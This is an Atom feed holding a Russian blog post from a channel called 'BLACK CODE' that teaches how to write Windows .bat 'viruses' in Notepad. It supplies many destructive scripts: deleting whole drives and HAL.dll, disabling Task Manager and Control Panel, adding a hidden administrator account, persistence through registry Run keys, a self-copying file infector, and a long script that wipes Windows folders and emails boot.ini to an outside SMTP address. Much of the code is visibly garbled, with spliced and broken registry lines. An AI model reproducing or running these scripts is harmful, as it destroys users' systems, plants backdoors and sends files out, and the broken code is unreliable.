<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>@rady</title><author><name>@rady</name></author><id>https://teletype.in/atom/rady</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/rady?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@rady?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rady"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/rady?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-05T16:05:19.174Z</updated><entry><id>rady:N30RvpGyN</id><link rel="alternate" type="text/html" href="https://teletype.in/@rady/N30RvpGyN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rady"></link><title>bat Вирусы. Вирусы в блокноте.</title><published>2020-08-17T11:19:54.354Z</published><updated>2020-08-17T11:57:42.003Z</updated><summary type="html">Создание вирусов в блокноте</summary><content type="html">
  &lt;p&gt;Создание вирусов в блокноте&lt;/p&gt;
  &lt;p&gt;PHOTO&lt;/p&gt;
  &lt;blockquote&gt;BLACK CODE&lt;/blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Всем привет! Это канал BLACK CODE. Сегодня мы рассмотрим такой феномен, как .bat вирусы, которые можно написать прямо в блокноте.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;/p&gt;
  &lt;p&gt;У всех есть блокнот/текстовый редактор, но как вы его используете? Думаю, что многие используют его для довольно привычных целей: заметки, текст и т.д.&lt;/p&gt;
  &lt;p&gt;Но не все знают, что в блокноте можно и написать простые вирусы, которые будут в формате .bat.&lt;/p&gt;
  &lt;p&gt;Важно понимать, что серьёзные вирусы вы не напишите, потому что команды довольно ограничены и по другим факторам. Мы пишем только в чисто образовательных целях!&lt;/p&gt;
  &lt;h2&gt;Теория&lt;/h2&gt;
  &lt;h3&gt;Что такое .bat/Как создать .bat&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Пакетный файл&lt;/strong&gt; (.bat файл) — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд, предназначенных для исполнения командным интерпретатором. После запуска пакетного файла программа-интерпретатор читает его строка за строкой и последовательно исполняет команды.&lt;/p&gt;
  &lt;p&gt;Для того, чтобы создать .bat файл, вам нужно:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;Открыть блокнот(или любой другой текстовый редактор)&lt;/li&gt;
    &lt;li&gt;Написать там нужные команды&lt;/li&gt;
    &lt;li&gt;Сохранить файл с расширением .bat(Пример: blackcode_virus.bat)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;И если нужно, то и запустить&lt;/p&gt;
  &lt;p&gt;СКРИНЫ&lt;/p&gt;
  &lt;p&gt;СКРИНЫ&lt;/p&gt;
  &lt;p&gt;СКРИНЫ&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Основные команды&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Echo – Команда вывода на экран&lt;br /&gt;Echo c:ski.bat &amp;gt;&amp;gt; autoexec.bat (Прописывает файл ski.bat в автозагрузку)&lt;br /&gt;@ — запрещает показывать&lt;br /&gt;&lt;a href=&quot;https://lolz.guru/members/98981/&quot; target=&quot;_blank&quot;&gt;@Echo&lt;/a&gt; off — запрещает вывод всех команд на экран&lt;br /&gt;for – цикл, выполняет команду указанное количество раз&lt;br /&gt;do – указывает, что делать&lt;br /&gt;%%i – переменная, куда подставляются значения&lt;br /&gt;in(1,1,100) – набор, который раскрывается в последовательность чисел от заданного начала, конца и шага&lt;br /&gt;В нашем случае от 1,2,3,4,5,6,7,8…100&lt;br /&gt;mkdir – создаёт папку&lt;br /&gt;rmdir – удаляет папку&lt;br /&gt;copy %0 x:\y - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat)&lt;br /&gt;Copy %0 c:ski.bat (копирует вирус только изменив названия)&lt;br /&gt;label x:y - переименовывает диск x на имя y (пример label C:Disc error)&lt;br /&gt;time х:у - меняет время на х часов и у минут (пример time 14:27)&lt;br /&gt;date x.y.z - меняет дату на x день, y месяц, z год (пример date 16.11.05)&lt;br /&gt;md х - создаст папку, в том месте, где наш вирус, с именем х&lt;br /&gt;del &lt;strong&gt;.&lt;/strong&gt;* /q - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок)&lt;br /&gt;del x:\y *&lt;strong&gt;.&lt;/strong&gt; /q - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q)&lt;br /&gt;del c:Program Files/q (удаляет все файлы из этой папки)&lt;br /&gt;assoc .х=.у - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3)&lt;br /&gt;ren 5-??.png 7-??.png переименование файлов 5-??.png в 7-??.png&lt;br /&gt;taskkill - позволяет завершить один или несколько процессов&lt;br /&gt;tskill - убить процесс&lt;br /&gt;reg - непосредственная работа с реестром&lt;br /&gt;logoff - Заверщить пользовательский сеанс&lt;br /&gt;%SystemRoot%/system32/rundll32 user32, SwapMouseButton - Данная строчка меняет клавиши мыши местами&lt;br /&gt;shutdown - выключить pc&lt;br /&gt;del — удаление одного или нескольких файлов&lt;br /&gt;getmac — отображает MAC-адрес одного или нескольких сетевых адаптеров компьютера&lt;br /&gt;md — создание папки&lt;br /&gt;msg — отправка сообщений пользователю&lt;br /&gt;ren — переименование файлов и папок&lt;br /&gt;rd — удаление папки&lt;br /&gt;rmdir — удаление папки&lt;br /&gt;reg — редактирование системного реестра&lt;br /&gt;xcopy — копирование файлов и дерева папок&lt;/p&gt;
  &lt;h2&gt;Пишем вирусы&lt;/h2&gt;
  &lt;h3&gt;Простые вирусы&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Убирает рабочий стол &lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f &amp;gt;nul&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Выключается компьютер &lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
shutdown -s -t 1 -c &amp;quot;BLACK CODE&amp;quot; &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Перезагрузка компьютера&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
shutdown -r -t 1 -c &amp;quot;BLACK CODE&amp;quot; &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Запрещает запускать программы&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d %SystemRoot%\explorer.exe /f &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;br /&gt;&lt;strong&gt;Удаление драйверов&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
del &amp;quot;%SystemRoot%\Driver Cache\i386\driver.cab&amp;quot; /f /q &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;br /&gt;&lt;strong&gt;Удаляет звуки&lt;/strong&gt; &lt;strong&gt;Windows&lt;/strong&gt; &lt;/p&gt;
  &lt;pre&gt;@echo off 
del &amp;quot;%SystemRoot%\Media&amp;quot; /q &amp;gt;nul&lt;/pre&gt;
  &lt;p&gt;&lt;br /&gt;&lt;strong&gt;Запрещает заходить в панель управления&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off 
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer 
/v NoControlPanel /t REG_DWORD /d 1 /f &amp;gt;nul&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Запрещает комбинацию Ctrl-Alt-Delete&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REGORD /d 1 /f &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Меняет местами значение кнопок мыши&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;%SystemRoot%/system32/rundll32 user32, SwapMouseButton &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет курсор мыши&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;del &amp;quot;%SystemRoot%Cursors*.*&amp;quot; &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Меняет название корзины&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Убирает панель управления&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REGD /d 1 /f&lt;/pre&gt;
  &lt;h3&gt;&lt;strong&gt;Серьёзные вирусы&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;rd [БукваДиск]: /s /q &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет все файлы в program files &lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;del c:Program Files/q&lt;/pre&gt;
  &lt;p&gt;&lt;br /&gt;&lt;strong&gt;Убивает процесс explorer.exe&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;taskkill /f /im explorer.exe &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Создает миллион папок&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;FOR /L %%i IN (1,1,1000000) DO md %%i &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет все драйвера, которые установлены на компьютере&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;del &amp;quot;%SystemRoot%Driver Cachei386driver.cab&amp;quot; /f /q &amp;gt;nul &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет команду DEL&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;del %0 &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Будет открывать бесконечно Paint&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@Echo off
:x
Start mspaint
goto x &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Изменяет расширение всех ярлыков на .blackcode&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;assoc .lnk=.blackcode &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Заражает Autoexec&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;copy &amp;quot;&amp;quot;%0&amp;quot;&amp;quot; &amp;quot;%SystemRoot%\system32\batinit.bat&amp;quot; &amp;gt;nul 
reg add &amp;quot;HKCU\SOFTWARE\Microsoft\Command Processor&amp;quot; /v AutoRun /t REGSZ /d &amp;quot;%SystemRoot%\syste m32\batinit.bat&amp;quot; /f &amp;gt;nul  &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Создает нового пользователя, с правами администратора, логин:blackcode и пароль: @blackcode_tg (Можете изменить)&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo offchcp 1251 
net user SUPPORT_3388945a0 /delete 
net user hacker hack /add 
net localgroup Администраторы hacker /add 
net localgroup Пользователи SUPPORT8945a0 /del 
reg add &amp;quot;HKEY_LOCLOCALINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList&amp;quot; /v &amp;quot;support&amp;quot; /t reg_dword /d 0 y &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Сбой системы - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и не реагирующая система, однако Windows продолжает работать.&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;rundll32 user,disableoemlayer &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Меняет местами кнопки мыши, но нельзя&lt;/strong&gt; &lt;strong&gt;поменять обратно&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;rundll32 user,SwapMouseButton &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Удаляет ядро системы&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;del %systemroot%\system32\HAL.dll &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Заражает .jpg *.mp3 *.doc *.html *.xls.&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off%[MrWeb]%
if &amp;#x27;%1==&amp;#x27;In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find &amp;quot;MrWeb&amp;quot;&amp;lt;%0&amp;gt;c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\.jpg ..\*..doc ..\tm? *.jp.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat&amp;gt;&amp;gt;%2.bat
echo start %2&amp;gt;&amp;gt;%2.bat%[MrWeb]%
:MrWeben&lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;&lt;br /&gt;Вирус заражает *.JPG в текущем каталоге&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off%[MrWeb]%
if &amp;#x27;%1==&amp;#x27;In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find &amp;quot;MrWeb&amp;quot;&amp;lt;%0&amp;gt;c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in () do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat&amp;gt;&amp;gt;%2.bat
echo start %2&amp;gt;&amp;gt;%2.bat%[MrWeb]%
:MrWeben&lt;/pre&gt;
  &lt;h3&gt;&lt;strong&gt;Жестокие вирусы&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;У пользователя будет очень сильно тормозить компьютер&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo off echo Set fso = CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;) &amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo do &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo Set tx = fso.CreateTextFile(&amp;quot;%systemdrive%\windows\system32\rundll32.dat&amp;quot;, True) &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo tx.WriteBlankLines(100000000) &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo tx.close &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo FSO.DeleteFile &amp;quot;%systemdrive%\windows\system32\rundll32.dat&amp;quot; &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
echo loop &amp;gt;&amp;gt; %systemdrive%\windows\system32\rundll32.vbs 
start %systemdrive%\windows\system32\rundll32.vbs 
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v systemhostrun /t REG_SSZ /d %systemdrive%\windows\system32\rundll32.vbs /f  &lt;/pre&gt;
  &lt;p&gt;&lt;strong&gt;Вирус, который убивает Windows. Не проверяйте на своем компьютере!&lt;/strong&gt;&lt;/p&gt;
  &lt;pre&gt;@echo This virus created by LIZA 
@echo Virus: pcforumhack.ru™ Virus 
@echo Autor: LIZA 
@echo off 
echo Chr(39)&amp;gt;%temp%\temp1.vbs 
echo Chr(39)&amp;gt;%temp%\temp2.vbs 
echo on error resume next &amp;gt; %temp%\temp.vbs 
echo Set S = CreateObject(&amp;quot;Wscript.Shell&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo set FSO=createobject(&amp;quot;scripting.filesystemobject&amp;quot;)&amp;gt;&amp;gt;%temp%\temp.vbs 
reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0 
copy %¶§% %SystemRoot%\user32dll.bat 
reg add &amp;quot;hklm\Software\Microsoft\Windows\CurrentVersion\Run&amp;quot; /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoDrives /t REGD /d 67108863 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f 
echo fso.deletefile &amp;quot;C:\ntldr&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
reg add &amp;quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&amp;quot; /v &amp;quot;NoSelectDownloadDir&amp;quot; /d 1 /f 
reg add &amp;quot;HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown&amp;quot; /v &amp;quot;IExplorer&amp;quot; /d 0 /f 
reg add &amp;quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&amp;quot; /v &amp;quot;NoFindFiles&amp;quot; /d 1 /f 
reg add &amp;quot;HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions&amp;quot; /v &amp;quot;NoNavButtons&amp;quot; /d 1 /f 
echo fso.deletefolder &amp;quot;D:\Windows&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo fso.deletefolder &amp;quot;I:\Windows&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo fso.deletefolder &amp;quot;C:\Windows&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo sr=s.RegRead(&amp;quot;HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo fso.deletefile sr+&amp;quot;\system32\hal.dll&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo sr=s.RegRead(&amp;quot;HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo fso.deletefolder sr+&amp;quot;\system32\dllcache&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo sr=s.RegRead(&amp;quot;HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo fso.deletefolder sr+&amp;quot;\system32\drives&amp;quot;,1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo s.regwrite &amp;quot;HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString&amp;quot;,&amp;quot;forum.whack.ru™&amp;quot;&amp;gt;&amp;gt;%temp%\temp.vbs 
echo s.regwrite &amp;quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner&amp;quot;,&amp;quot;forum.whack.ru™&amp;quot;&amp;gt;&amp;gt;%temp%\temp.vbs 
echo s.regwrite &amp;quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization&amp;quot;,&amp;quot;forum.whack.ru™&amp;quot;&amp;gt;&amp;gt;%temp%\temp.vbs 
echo on error resume next &amp;gt; %temp%\temp1.vbs 
echo set FSO=createobject(&amp;quot;scripting.filesystemobject&amp;quot;)&amp;gt;&amp;gt;%temp%\temp1.vbs 
echo do&amp;gt;&amp;gt;%temp%\temp1.vbs 
echo fso.getfile (&amp;quot;A:\&amp;quot;)&amp;gt;&amp;gt;%temp%\temp1.vbs 
echo loop&amp;gt;&amp;gt;%temp%\temp1.vbs 
echo on error resume next &amp;gt; %temp%\temp2.vbs 
echo Set S = CreateObject(&amp;quot;Wscript.Shell&amp;quot;) &amp;gt;&amp;gt; %temp%\temp2.vbs 
echo do&amp;gt;&amp;gt;%temp%\temp2.vbs 
echo execute&amp;quot;S.Run &amp;quot;&amp;quot;%comspec% /c echo &amp;quot;&amp;quot; &amp;amp; Chr(7), 0, True&amp;quot;&amp;gt;&amp;gt;%temp%\temp2.vbs 
echo loop&amp;gt;&amp;gt;%temp%\temp2.vbs 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System&amp;quot; /v disabletaskmgr /t REGeg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System&amp;quot; /v disableregistrytools /t REG_DWORD /d 1 /f 
reDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuPinnedList /t REG add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f 
reg DWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoUserNameInStartMenu /t REGdd &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum&amp;quot; /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f 
reg adDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoNetworkConnections /t REG &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f 
reg add DWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f 
reg add &amp;quot;hDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoFavoritesMenu /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoSetFolders /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\DWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoFind /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\SoDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoRun /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\SoftDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoClose /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\SoftwaDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoSMMyDocs /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\SoftwareDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\MDWORD /d 1 /f 
reg add &amp;quot;hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&amp;quot; /v NoControlPanel /t REGteobject(&amp;quot;shell.application&amp;quot;)&amp;gt;&amp;gt;%temp%\temp.vbs 
echo application.minimizeall&amp;gt;&amp;gt;%temp%\temp.vbs 
reg add &amp;quot;hklm\Software\Microsoft\Windows\CurrentVersion\run&amp;quot; /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f 
start rundll32 user32, SwapMouseButton 
reg add &amp;quot;HKCR\exefile\shell\open\command&amp;quot; /ve /t REG\temp.vbs 
echo while i^&amp;gt;0 or i^&amp;lt;0 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo S.popup &amp;quot;forum.whack.ru™&amp;quot;,0, &amp;quot;forum.whack.ru™&amp;quot;,0+16 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo i=i-1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo wend &amp;gt;&amp;gt; %temp%\temp.vbs 
echo do &amp;gt;&amp;gt; %temp%\temp.vbs 
echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo s.sendkeys&amp;quot;{capslock}&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo s.sendkeys&amp;quot;{numlock}&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo wscript.sleep 200 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo s.sendkeys&amp;quot;{scrolllock}&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo loop&amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set oWMP = CreateObject(&amp;quot;WMPlayer.OCX.7&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set colCDROMs = oWMP.cdromCollection &amp;gt;&amp;gt; %temp%\temp.vbs 
echo if colCDROMs.Count ^&amp;gt;= 1 then &amp;gt;&amp;gt; %temp%\temp.vbs 
echo For i = 0 to colCDROMs.Count - 1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo colCDROMs.Item(i).eject &amp;gt;&amp;gt; %temp%\temp.vbs 
echo next &amp;gt;&amp;gt; %temp%\temp.vbs 
echo End If &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Call SendPost(&amp;quot;smtp.mail.ru&amp;quot;, &amp;quot;forum.whack.ru™@mail.ru&amp;quot;, &amp;quot;support@mail.ru&amp;quot;, &amp;quot;...&amp;quot;, &amp;quot;Копм заражен!&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set iMsg = CreateObject(&amp;quot;CDO.Message&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set iConf = CreateObject(&amp;quot;CDO.Configuration&amp;quot;) &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Set Flds = iConf.Fields &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendusing&amp;quot;) = 2 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&amp;quot;) = 1 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendusername&amp;quot;) = &amp;quot;support&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&amp;quot;) = &amp;quot;support&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&amp;quot;) = &amp;quot;smtp.mail.ru&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Item(&amp;quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&amp;quot;) = 25 &amp;gt;&amp;gt; %temp%\temp.vbs 
echo Flds.Update &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.Configuration = iConf &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.To = strTo &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.From = strFrom &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.Subject = strSubject &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.TextBody = strBody &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.AddAttachment &amp;quot;c:\boot.ini&amp;quot; &amp;gt;&amp;gt; %temp%\temp.vbs 
echo iMsg.Send &amp;gt;&amp;gt; %temp%\temp.vbs 
